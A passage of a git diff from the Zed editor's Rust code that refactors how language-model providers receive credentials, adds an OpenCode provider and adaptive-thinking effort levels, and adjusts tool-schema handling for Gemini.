0000000000000000000000000000000000000000..0ba793e99aad1caa25f049a96faf02c16e8970fa --- /dev/null +++ b/crates/language_model/src/provider/zed.rs @@ -0,0 +1,5 @@ +use crate::{LanguageModelProviderId, LanguageModelProviderName}; + +pub const ZED_CLOUD_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("zed.dev"); +pub const ZED_CLOUD_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("Zed"); diff --git a/crates/language_model/src/registry.rs b/crates/language_model/src/registry.rs index cf7718f7b102010cc0c8a981a0425583436176b7..bf14fbb0b5804505b33074e6e4cbcc36ddf21fab 100644 --- a/crates/language_model/src/registry.rs +++ b/crates/language_model/src/registry.rs @@ -101,7 +101,7 @@ impl ConfiguredModel { } pub fn is_provided_by_zed(&self) -> bool { - self.provider.id() == crate::ZED_CLOUD_PROVIDER_ID + self.provider.id() == crate::provider::ZED_CLOUD_PROVIDER_ID } } diff --git a/crates/language_model/src/request.rs b/crates/language_model/src/request.rs index 9be3002deae758ee99432842a31e3b90754ada0f..9a5e96078cd4d952185261c79032c5c5fdf30060 100644 --- a/crates/language_model/src/request.rs +++ b/crates/language_model/src/request.rs @@ -3,7 +3,6 @@ use std::sync::Arc; use anyhow::Result; use base64::write::EncoderWriter; -use cloud_llm_client::CompletionIntent; use gpui::{ App, AppContext as _, DevicePixels, Image, ImageFormat, ObjectFit, SharedString, Size, Task, point, px, size, @@ -234,7 +233,9 @@ pub struct LanguageModelToolResult { pub tool_use_id: LanguageModelToolUseId, pub tool_name: Arc, pub is_error: bool, + /// The tool output formatted for presenting to the model pub content: LanguageModelToolResultContent, + /// The raw tool output, if available, often for debugging or extra state for replay pub output: Option, } @@ -441,6 +442,21 @@ pub enum LanguageModelToolChoice { None, } +#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum CompletionIntent { + UserPrompt, + Subagent, + ToolResults, + ThreadSummarization, + ThreadContextSummarization, + CreateFile, + EditFile, + InlineAssist, + TerminalInlineAssist, + GenerateGitCommitMessage, +} + #[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq)] pub struct LanguageModelRequest { pub thread_id: Option, diff --git a/crates/language_model/src/role.rs b/crates/language_model/src/role.rs index 4b47ef36dd564e5950ce7d42a7e4f9263f3998b7..8abc0a74b271a3d434f8dbcf3093aee83e096a89 100644 --- a/crates/language_model/src/role.rs +++ b/crates/language_model/src/role.rs @@ -10,23 +10,6 @@ pub enum Role { } impl Role { - pub fn from_proto(role: i32) -> Role { - match proto::LanguageModelRole::from_i32(role) { - Some(proto::LanguageModelRole::LanguageModelUser) => Role::User, - Some(proto::LanguageModelRole::LanguageModelAssistant) => Role::Assistant, - Some(proto::LanguageModelRole::LanguageModelSystem) => Role::System, - None => Role::User, - } - } - - pub fn to_proto(self) -> proto::LanguageModelRole { - match self { - Role::User => proto::LanguageModelRole::LanguageModelUser, - Role::Assistant => proto::LanguageModelRole::LanguageModelAssistant, - Role::System => proto::LanguageModelRole::LanguageModelSystem, - } - } - pub fn cycle(self) -> Role { match self { Role::User => Role::Assistant, diff --git a/crates/language_model/src/tool_schema.rs b/crates/language_model/src/tool_schema.rs index f9402c28dc316f9ccdacc58afaa0eebd6699f92d..878870482a7527bf815797d16e03ad8edc79642e 100644 --- a/crates/language_model/src/tool_schema.rs +++ b/crates/language_model/src/tool_schema.rs @@ -17,7 +17,12 @@ pub enum LanguageModelToolSchemaFormat { pub fn root_schema_for(format: LanguageModelToolSchemaFormat) -> Schema { let mut generator = match format { - LanguageModelToolSchemaFormat::JsonSchema => SchemaSettings::draft07().into_generator(), + LanguageModelToolSchemaFormat::JsonSchema => SchemaSettings::draft07() + .with(|settings| { + settings.meta_schema = None; + settings.inline_subschemas = true; + }) + .into_generator(), LanguageModelToolSchemaFormat::JsonSchemaSubset => SchemaSettings::openapi3() .with(|settings| { settings.meta_schema = None; @@ -62,6 +67,7 @@ pub fn adapt_schema_to_format( if let Value::Object(obj) = json { obj.remove("$schema"); obj.remove("title"); + obj.remove("description"); } match format { @@ -100,9 +106,12 @@ fn adapt_to_json_schema_subset(json: &mut Value) -> Result<()> { ); } - const KEYS_TO_REMOVE: [(&str, fn(&Value) -> bool); 5] = [ + const KEYS_TO_REMOVE: [(&str, fn(&Value) -> bool); 6] = [ ("format", |value| value.is_string()), - ("additionalProperties", |value| value.is_boolean()), + // Gemini doesn't support `additionalProperties` in any form (boolean or schema object) + ("additionalProperties", |_| true), + // Gemini doesn't support `propertyNames` + ("propertyNames", |_| true), ("exclusiveMinimum", |value| value.is_number()), ("exclusiveMaximum", |value| value.is_number()), ("optional", |value| value.is_boolean()), @@ -229,6 +238,28 @@ mod tests { "format": {}, }) ); + + // additionalProperties as an object schema is also unsupported by Gemini + let mut json = json!({ + "type": "object", + "properties": { + "name": { "type": "string" } + }, + "additionalProperties": { "type": "string" }, + "propertyNames": { "pattern": "^[A-Za-z]+$" } + }); + + adapt_to_json_schema_subset(&mut json).unwrap(); + + assert_eq!( + json, + json!({ + "type": "object", + "properties": { + "name": { "type": "string" } + } + }) + ); } #[test] diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index ece0d68152a20cbf77d0c082746959684816f115..4ebfce695e587265ea39077c67c84ce9b01e5352 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -20,7 +20,6 @@ aws-credential-types = { workspace = true, features = ["hardcoded-credentials"] aws_http_client.workspace = true base64.workspace = true bedrock = { workspace = true, features = ["schemars"] } -chrono.workspace = true client.workspace = true cloud_api_types.workspace = true cloud_llm_client.workspace = true @@ -48,6 +47,7 @@ menu.workspace = true mistral = { workspace = true, features = ["schemars"] } ollama = { workspace = true, features = ["schemars"] } open_ai = { workspace = true, features = ["schemars"] } +opencode = { workspace = true, features = ["schemars"] } open_router = { workspace = true, features = ["schemars"] } partial-json-fixer.workspace = true release_channel.workspace = true @@ -68,7 +68,6 @@ vercel = { workspace = true, features = ["schemars"] } x_ai = { workspace = true, features = ["schemars"] } [dev-dependencies] -editor = { workspace = true, features = ["test-support"] } language_model = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true -project = { workspace = true, features = ["test-support"] } + diff --git a/crates/language_models/src/language_models.rs b/crates/language_models/src/language_models.rs index f22ea00c9e801e120bf057a06683487bc4deb22a..3154db91a43d1381f5b3f122a724be249adeb79b 100644 --- a/crates/language_models/src/language_models.rs +++ b/crates/language_models/src/language_models.rs @@ -3,6 +3,7 @@ use std::sync::Arc; use ::settings::{Settings, SettingsStore}; use client::{Client, UserStore}; use collections::HashSet; +use credentials_provider::CredentialsProvider; use gpui::{App, Context, Entity}; use language_model::{LanguageModelProviderId, LanguageModelRegistry}; use provider::deepseek::DeepSeekLanguageModelProvider; @@ -24,51 +25,65 @@ use crate::provider::ollama::OllamaLanguageModelProvider; use crate::provider::open_ai::OpenAiLanguageModelProvider; use crate::provider::open_ai_compatible::OpenAiCompatibleLanguageModelProvider; use crate::provider::open_router::OpenRouterLanguageModelProvider; +use crate::provider::opencode::OpenCodeLanguageModelProvider; use crate::provider::vercel::VercelLanguageModelProvider; use crate::provider::vercel_ai_gateway::VercelAiGatewayLanguageModelProvider; use crate::provider::x_ai::XAiLanguageModelProvider; pub use crate::settings::*; pub fn init(user_store: Entity, client: Arc, cx: &mut App) { + let credentials_provider = client.credentials_provider(); let registry = LanguageModelRegistry::global(cx); registry.update(cx, |registry, cx| { - register_language_model_providers(registry, user_store, client.clone(), cx); + register_language_model_providers( + registry, + user_store, + client.clone(), + credentials_provider.clone(), + cx, + ); }); // Subscribe to extension store events to track LLM extension installations if let Some(extension_store) = extension_host::ExtensionStore::try_global(cx) { cx.subscribe(&extension_store, { - let registry = registry.clone(); - move |extension_store, event, cx| match event { - extension_host::Event::ExtensionInstalled(extension_id) => { - if let Some(manifest) = extension_store - .read(cx) - .extension_manifest_for_id(extension_id) - { - if !manifest.language_model_providers.is_empty() { - registry.update(cx, |registry, cx| { - registry.extension_installed(extension_id.clone(), cx); - }); + let registry = registry.downgrade(); + move |extension_store, event, cx| { + let Some(registry) = registry.upgrade() else { + return; + }; + match event { + extension_host::Event::ExtensionInstalled(extension_id) => { + if let Some(manifest) = extension_store + .read(cx) + .extension_manifest_for_id(extension_id) + { + if !manifest.language_model_providers.is_empty() { + registry.update(cx, |registry, cx| { + registry.extension_installed(extension_id.clone(), cx); + }); + } } } - } - extension_host::Event::ExtensionUninstalled(extension_id) => { - registry.update(cx, |registry, cx| { - registry.extension_uninstalled(extension_id, cx); - }); - } - extension_host::Event::ExtensionsUpdated => { - let mut new_ids = HashSet::default(); - for (extension_id, entry) in extension_store.read(cx).installed_extensions() { - if !entry.manifest.language_model_providers.is_empty() { - new_ids.insert(extension_id.clone()); + extension_host::Event::ExtensionUninstalled(extension_id) => { + registry.update(cx, |registry, cx| { + registry.extension_uninstalled(extension_id, cx); + }); + } + extension_host::Event::ExtensionsUpdated => { + let mut new_ids = HashSet::default(); + for (extension_id, entry) in extension_store.read(cx).installed_extensions() + { + if !entry.manifest.language_model_providers.is_empty() { + new_ids.insert(extension_id.clone()); + } } + registry.update(cx, |registry, cx| { + registry.sync_installed_llm_extensions(new_ids, cx); + }); } - registry.update(cx, |registry, cx| { - registry.sync_installed_llm_extensions(new_ids, cx); - }); + _ => {} } - _ => {} } }) .detach(); @@ -97,10 +112,15 @@ pub fn init(user_store: Entity, client: Arc, cx: &mut App) { &HashSet::default(), &openai_compatible_providers, client.clone(), + credentials_provider.clone(), cx, ); }); + let registry = registry.downgrade(); cx.observe_global::(move |cx| { + let Some(registry) = registry.upgrade() else { + return; + }; let openai_compatible_providers_new = AllLanguageModelSettings::get_global(cx) .openai_compatible .keys() @@ -113,6 +133,7 @@ pub fn init(user_store: Entity, client: Arc, cx: &mut App) { &openai_compatible_providers, &openai_compatible_providers_new, client.clone(), + credentials_provider.clone(), cx, ); }); @@ -127,6 +148,7 @@ fn register_openai_compatible_providers( old: &HashSet>, new: &HashSet>, client: Arc, + credentials_provider: Arc, cx: &mut Context, ) { for provider_id in old { @@ -141,6 +163,7 @@ fn register_openai_compatible_providers( Arc::new(OpenAiCompatibleLanguageModelProvider::new( provider_id.clone(), client.http_client(), + credentials_provider.clone(), cx, )), cx, @@ -153,6 +176,7 @@ fn register_language_model_providers( registry: &mut LanguageModelRegistry, user_store: Entity, client: Arc, + credentials_provider: Arc, cx: &mut Context, ) { registry.register_provider( @@ -166,58 +190,105 @@ fn register_language_model_providers( registry.register_provider( Arc::new(AnthropicLanguageModelProvider::new( client.http_client(), + credentials_provider.clone(), cx, )), cx, ); registry.register_provider( - Arc::new(OpenAiLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(OpenAiLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(OllamaLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(OllamaLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(LmStudioLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(LmStudioLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(DeepSeekLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(DeepSeekLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(GoogleLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(GoogleLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - MistralLanguageModelProvider::global(client.http_client(), cx), + MistralLanguageModelProvider::global( + client.http_client(), + credentials_provider.clone(), + cx, + ), cx, ); registry.register_provider( - Arc::new(BedrockLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(BedrockLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( Arc::new(OpenRouterLanguageModelProvider::new( client.http_client(), + credentials_provider.clone(), cx, )), cx, ); registry.register_provider( - Arc::new(VercelLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(VercelLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( Arc::new(VercelAiGatewayLanguageModelProvider::new( client.http_client(), + credentials_provider.clone(), + cx, + )), + cx, + ); + registry.register_provider( + Arc::new(XAiLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), cx, )), cx, ); registry.register_provider( - Arc::new(XAiLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(OpenCodeLanguageModelProvider::new( + client.http_client(), + credentials_provider, + cx, + )), cx, ); registry.register_provider(Arc::new(CopilotChatLanguageModelProvider::new(cx)), cx); diff --git a/crates/language_models/src/provider.rs b/crates/language_models/src/provider.rs index 27f43e37f5be343c3f80201c013e96d858bb00de..d3c433974599399160e602b8f201b9fd0af874cb 100644 --- a/crates/language_models/src/provider.rs +++ b/crates/language_models/src/provider.rs @@ -10,6 +10,7 @@ pub mod ollama; pub mod open_ai; pub mod open_ai_compatible; pub mod open_router; +pub mod opencode; mod util; pub mod vercel; pub mod vercel_ai_gateway; diff --git a/crates/language_models/src/provider/anthropic.rs b/crates/language_models/src/provider/anthropic.rs index d3bd129248406211e43e69fc5880310a9dedbc97..c1b8bc1a3bb1b602b67ae5563d8acc3b05a94d47 100644 --- a/crates/language_models/src/provider/anthropic.rs +++ b/crates/language_models/src/provider/anthropic.rs @@ -1,14 +1,18 @@ +pub mod telemetry; + use anthropic::{ ANTHROPIC_API_URL, AnthropicError, AnthropicModelMode, ContentDelta, CountTokensRequest, Event, ResponseContent, ToolResultContent, ToolResultPart, Usage, }; use anyhow::Result; use collections::{BTreeMap, HashMap}; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{AnyView, App, AsyncApp, Context, Entity, Task}; use http_client::HttpClient; use language_model::{ - ApiKeyState, AuthenticateError, ConfigurationViewTargetAgent, EnvVar, IconOrSvg, LanguageModel, + ANTHROPIC_PROVIDER_ID, ANTHROPIC_PROVIDER_NAME, ApiKeyState, AuthenticateError, + ConfigurationViewTargetAgent, EnvVar, IconOrSvg, LanguageModel, LanguageModelCacheConfiguration, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, @@ -24,12 +28,12 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; pub use settings::AnthropicAvailableModel as AvailableModel; -const PROVIDER_ID: LanguageModelProviderId = language_model::ANTHROPIC_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::ANTHROPIC_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = ANTHROPIC_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = ANTHROPIC_PROVIDER_NAME; #[derive(Default, Clone, Debug, PartialEq)] pub struct AnthropicSettings { @@ -48,6 +52,7 @@ static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -56,30 +61,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = AnthropicLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = AnthropicLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl AnthropicLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -140,13 +166,10 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider { } fn recommended_models(&self, _cx: &App) -> Vec> { - [ - anthropic::Model::ClaudeSonnet4_6, - anthropic::Model::ClaudeSonnet4_6Thinking, - ] - .into_iter() - .map(|model| self.create_language_model(model)) - .collect() + [anthropic::Model::ClaudeSonnet4_6] + .into_iter() + .map(|model| self.create_language_model(model)) + .collect() } fn provided_models(&self, cx: &App) -> Vec> { @@ -178,7 +201,12 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider { max_output_tokens: model.max_output_tokens, default_temperature: model.default_temperature, extra_beta_headers: model.extra_beta_headers.clone(), - mode: model.mode.unwrap_or_default().into(), + mode: match model.mode.unwrap_or_default() { + settings::ModelMode::Default => AnthropicModelMode::Default, + settings::ModelMode::Thinking { budget_tokens } => { + AnthropicModelMode::Thinking { budget_tokens } + } + }, }, ); } @@ -356,10 +384,14 @@ pub fn into_anthropic_count_tokens_request( } else { Some(anthropic::StringOrContents::String(system_message)) }, - thinking: if request.thinking_allowed - && let AnthropicModelMode::Thinking { budget_tokens } = mode - { - Some(anthropic::Thinking::Enabled { budget_tokens }) + thinking: if request.thinking_allowed { + match mode { + AnthropicModelMode::Thinking { budget_tokens } => { + Some(anthropic::Thinking::Enabled { budget_tokens }) + } + AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive), + AnthropicModelMode::Default => None, + } } else { None }, @@ -517,7 +549,36 @@ impl LanguageModel for AnthropicModel { } fn supports_thinking(&self) -> bool { - matches!(self.model.mode(), AnthropicModelMode::Thinking { .. }) + self.model.supports_thinking() + } + + fn supported_effort_levels(&self) -> Vec { + if self.model.supports_adaptive_thinking() { + vec![ + language_model::LanguageModelEffortLevel { + name: "Low".into(), + value: "low".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "Medium".into(), + value: "medium".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "High".into(), + value: "high".into(), + is_default: true, + }, + language_model::LanguageModelEffortLevel { + name: "Max".into(), + value: "max".into(), + is_default: false, + }, + ] + } else { + Vec::new() + } } fn telemetry_id(&self) -> String { @@ -700,10 +761,14 @@ pub fn into_anthropic( } else { Some(anthropic::StringOrContents::String(system_message)) }, - thinking: if request.thinking_allowed - && let AnthropicModelMode::Thinking { budget_tokens } = mode - { - Some(anthropic::Thinking::Enabled { budget_tokens }) + thinking: if request.thinking_allowed { + match mode { + AnthropicModelMode::Thinking { budget_tokens } => { + Some(anthropic::Thinking::Enabled { budget_tokens }) + } + AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive), + AnthropicModelMode::Default => None, + } } else { None }, @@ -723,7 +788,24 @@ pub fn into_anthropic( LanguageModelToolChoice::None => anthropic::ToolChoice::None, }), metadata: None, - output_config: None, + output_config: if request.thinking_allowed + && matches!(mode, AnthropicModelMode::AdaptiveThinking) + { + request.thinking_effort.as_deref().and_then(|effort| { + let effort = match effort { + "low" => Some(anthropic::Effort::Low), + "medium" => Some(anthropic::Effort::Medium), + "high" => Some(anthropic::Effort::High), + "max" => Some(anthropic::Effort::Max), + _ => None, + }; + effort.map(|effort| anthropic::OutputConfig { + effort: Some(effort), + }) + }) + } else { + None + }, stop_sequences: Vec::new(), speed: request.speed.map(From::from), temperature: request.temperature.or(Some(default_temperature)), @@ -817,9 +899,9 @@ impl AnthropicEventMapper { // valid JSON that serde can accept, e.g. by closing // unclosed delimiters. This way, we can update the // UI with whatever has been streamed back so far. - if let Ok(input) = serde_json::Value::from_str( - &partial_json_fixer::fix_json(&tool_use.input_json), - ) { + if let Ok(input) = + serde_json::Value::from_str(&fix_streamed_json(&tool_use.input_json)) + { return vec![Ok(LanguageModelCompletionEvent::ToolUse( LanguageModelToolUse { id: tool_use.id.clone().into(), diff --git a/crates/language_model/src/telemetry.rs b/crates/language_models/src/provider/anthropic/telemetry.rs similarity index 95% rename from crates/language_model/src/telemetry.rs rename to crates/language_models/src/provider/anthropic/telemetry.rs index 6d7f4df7f644115cae7b2148f4d78fde19674344..75fb11a81b479635ea02db77a2df8a769e795e01 100644 --- a/crates/language_model/src/telemetry.rs +++ b/crates/language_models/src/provider/anthropic/telemetry.rs @@ -1,8 +1,8 @@ -use crate::ANTHROPIC_PROVIDER_ID; use anthropic::ANTHROPIC_API_URL; use anyhow::{Context as _, anyhow}; use gpui::BackgroundExecutor; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest}; +use language_model::{ANTHROPIC_PROVIDER_ID, LanguageModel}; use std::env; use std::sync::Arc; use util::ResultExt; @@ -52,7 +52,7 @@ impl AnthropicEventType { } pub fn report_anthropic_event( - model: &Arc, + model: &Arc, event: AnthropicEventData, cx: &gpui::App, ) { @@ -69,7 +69,7 @@ pub struct AnthropicEventReporter { } impl AnthropicEventReporter { - pub fn new(model: &Arc, cx: &gpui::App) -> Self { + pub fn new(model: &Arc, cx: &gpui::App) -> Self { Self { http_client: cx.http_client(), executor: cx.background_executor().clone(), diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index bcf8401c1c14ae1a74bb7136141d0b35509cdd40..4320763e2c5c6de7f3fe9238d7a4991565c3bfcd 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -48,7 +48,7 @@ use ui_input::InputField; use util::ResultExt; use crate::AllLanguageModelSettings; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; actions!(bedrock, [Tab, TabPrev]); @@ -195,12 +195,13 @@ pub struct State { settings: Option, /// Whether credentials came from environment variables (only relevant for static credentials) credentials_from_env: bool, + credentials_provider: Arc, _subscription: Subscription, } impl State { fn reset_auth(&self, cx: &mut Context) -> Task> { - let credentials_provider = ::global(cx); + let credentials_provider = self.credentials_provider.clone(); cx.spawn(async move |this, cx| { credentials_provider .delete_credentials(AMAZON_AWS_URL, cx) @@ -220,7 +221,7 @@ impl State { cx: &mut Context, ) -> Task> { let auth = credentials.clone().into_auth(); - let credentials_provider = ::global(cx); + let credentials_provider = self.credentials_provider.clone(); cx.spawn(async move |this, cx| { credentials_provider .write_credentials( @@ -287,7 +288,7 @@ impl State { &self, cx: &mut Context, ) -> Task> { - let credentials_provider = ::global(cx); + let credentials_provider = self.credentials_provider.clone(); cx.spawn(async move |this, cx| { // Try environment variables first let (auth, from_env) = if let Some(bearer_token) = &ZED_BEDROCK_BEARER_TOKEN_VAR.value { @@ -344,7 +345,7 @@ impl State { .ok_or(AuthenticateError::CredentialsNotFound)?; let credentials_str = String::from_utf8(credentials_bytes) - .context("invalid {PROVIDER_NAME} credentials")?; + .with_context(|| format!("invalid {PROVIDER_NAME} credentials"))?; let credentials: BedrockCredentials = serde_json::from_str(&credentials_str).context("failed to parse credentials")?; @@ -400,11 +401,16 @@ pub struct BedrockLanguageModelProvider { } impl BedrockLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| State { auth: None, settings: Some(AllLanguageModelSettings::get_global(cx).bedrock.clone()), credentials_from_env: false, + credentials_provider, _subscription: cx.observe_global::(|_, cx| { cx.notify(); }), @@ -642,10 +648,36 @@ impl LanguageModel for BedrockModel { } fn supports_thinking(&self) -> bool { - matches!( - self.model.mode(), - BedrockModelMode::Thinking { .. } | BedrockModelMode::AdaptiveThinking { .. } - ) + self.model.supports_thinking() + } + + fn supported_effort_levels(&self) -> Vec { + if self.model.supports_adaptive_thinking() { + vec![ + language_model::LanguageModelEffortLevel { + name: "Low".into(), + value: "low".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "Medium".into(), + value: "medium".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "High".into(), + value: "high".into(), + is_default: true, + }, + language_model::LanguageModelEffortLevel { + name: "Max".into(), + value: "max".into(), + is_default: false, + }, + ] + } else { + Vec::new() + } } fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { @@ -658,6 +690,10 @@ impl LanguageModel for BedrockModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn telemetry_id(&self) -> String { format!("bedrock/{}", self.model.id()) } @@ -714,7 +750,7 @@ impl LanguageModel for BedrockModel { model_id, self.model.default_temperature(), self.model.max_output_tokens(), - self.model.mode(), + self.model.thinking_mode(), self.model.supports_caching(), self.model.supports_tool_use(), use_extended_context, @@ -807,7 +843,7 @@ pub fn into_bedrock( model: String, default_temperature: f32, max_output_tokens: u64, - mode: BedrockModelMode, + thinking_mode: BedrockModelMode, supports_caching: bool, supports_tool_use: bool, allow_extended_context: bool, @@ -1081,11 +1117,24 @@ pub fn into_bedrock( system: Some(system_message), tools: tool_config, thinking: if request.thinking_allowed { - match mode { + match thinking_mode { BedrockModelMode::Thinking { budget_tokens } => { Some(bedrock::Thinking::Enabled { budget_tokens }) } - BedrockModelMode::AdaptiveThinking { effort } => { + BedrockModelMode::AdaptiveThinking { + effort: default_effort, + } => { + let effort = request + .thinking_effort + .as_deref() + .and_then(|e| match e { + "low" => Some(bedrock::BedrockAdaptiveThinkingEffort::Low), + "medium" => Some(bedrock::BedrockAdaptiveThinkingEffort::Medium), + "high" => Some(bedrock::BedrockAdaptiveThinkingEffort::High), + "max" => Some(bedrock::BedrockAdaptiveThinkingEffort::Max), + _ => None, + }) + .unwrap_or(default_effort); Some(bedrock::Thinking::Adaptive { effort }) } BedrockModelMode::Default => None, @@ -1200,8 +1249,25 @@ pub fn map_to_language_model_completion_events( .get_mut(&cb_delta.content_block_index) { tool_use.input_json.push_str(tool_output.input()); + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&tool_use.input_json), + ) { + Some(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: tool_use.id.clone().into(), + name: tool_use.name.clone().into(), + is_input_complete: false, + raw_input: tool_use.input_json.clone(), + input, + thought_signature: None, + }, + ))) + } else { + None + } + } else { + None } - None } Some(ContentBlockDelta::ReasoningContent(thinking)) => match thinking { ReasoningContentBlockDelta::Text(thoughts) => { @@ -1553,7 +1619,8 @@ impl Render for ConfigurationView { } v_flex() - .size_full() + .min_w_0() + .w_full() .track_focus(&self.focus_handle) .on_action(cx.listener(Self::on_tab)) .on_action(cx.listener(Self::on_tab_prev)) diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 19009013bf84ad9751e9ed0de2d3338b279a258e..29623cc998ad0fe933e9a29c45c651f7be010b07 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -1,9 +1,10 @@ use ai_onboarding::YoungAccountBanner; use anthropic::AnthropicModelMode; use anyhow::{Context as _, Result, anyhow}; -use chrono::{DateTime, Utc}; -use client::{Client, UserStore, zed_urls}; -use cloud_api_types::Plan; +use client::{ + Client, NeedsLlmTokenRefresh, RefreshLlmTokenListener, UserStore, global_llm_token, zed_urls, +}; +use cloud_api_types::{OrganizationId, Plan}; use cloud_llm_client::{ CLIENT_SUPPORTS_STATUS_MESSAGES_HEADER_NAME, CLIENT_SUPPORTS_STATUS_STREAM_ENDED_HEADER_NAME, CLIENT_SUPPORTS_X_AI_HEADER_NAME, CompletionBody, CompletionEvent, CompletionRequestStatus, @@ -20,12 +21,14 @@ use gpui::{AnyElement, AnyView, App, AsyncApp, Context, Entity, Subscription, Ta use http_client::http::{HeaderMap, HeaderValue}; use http_client::{AsyncBody, HttpClient, HttpRequestExt, Method, Response, StatusCode}; use language_model::{ - AuthenticateError, IconOrSvg, LanguageModel, LanguageModelCacheConfiguration, + ANTHROPIC_PROVIDER_ID, ANTHROPIC_PROVIDER_NAME, AuthenticateError, GOOGLE_PROVIDER_ID, + GOOGLE_PROVIDER_NAME, IconOrSvg, LanguageModel, LanguageModelCacheConfiguration, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelEffortLevel, LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, - LanguageModelToolChoice, LanguageModelToolSchemaFormat, LlmApiToken, NeedsLlmTokenRefresh, - PaymentRequiredError, RateLimiter, RefreshLlmTokenListener, + LanguageModelToolChoice, LanguageModelToolSchemaFormat, LlmApiToken, OPEN_AI_PROVIDER_ID, + OPEN_AI_PROVIDER_NAME, PaymentRequiredError, RateLimiter, X_AI_PROVIDER_ID, X_AI_PROVIDER_NAME, + ZED_CLOUD_PROVIDER_ID, ZED_CLOUD_PROVIDER_NAME, }; use release_channel::AppVersion; use schemars::JsonSchema; @@ -43,7 +46,6 @@ use std::task::Poll; use std::time::Duration; use thiserror::Error; use ui::{TintColor, prelude::*}; -use util::{ResultExt as _, maybe}; use 